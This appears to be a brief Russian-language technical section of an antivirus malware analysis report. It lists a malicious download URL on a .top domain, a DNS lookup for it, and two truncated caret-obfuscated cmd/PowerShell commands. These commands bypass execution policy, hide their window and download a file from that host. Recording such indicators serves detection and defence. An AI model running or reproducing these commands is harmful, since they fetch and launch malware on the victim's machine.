Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWershE^l^l.E^xE ^-e^X^EC^Uti^ONPoL^icy ^By^paS^S ^-^N^Op^r^O^filE -Wind^OWS^T^Yl^e^ ^hiddEN^ (nE^w^-obJ^eC^T SY^sTE^M.^n^Et^.wEbCL^i^EnT)^.d^owNlO^AD^FIl^E^(^'http://www.fa...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "PoWershE^l^l.E^xE ^-e^X^EC^Uti^ONPoL^icy ^By^paS^S ^-^N^Op^r^O^filE -Wind^OWS^T^Yl^e^ ^hiddEN^ (nE^w^-obJ^eC^T SY^sTE^M.^n^Et^.wEbCL^i^EnT)^.d^owNlO^AD^FIl^E^(^'http://www.fa...' (со скрытым окном)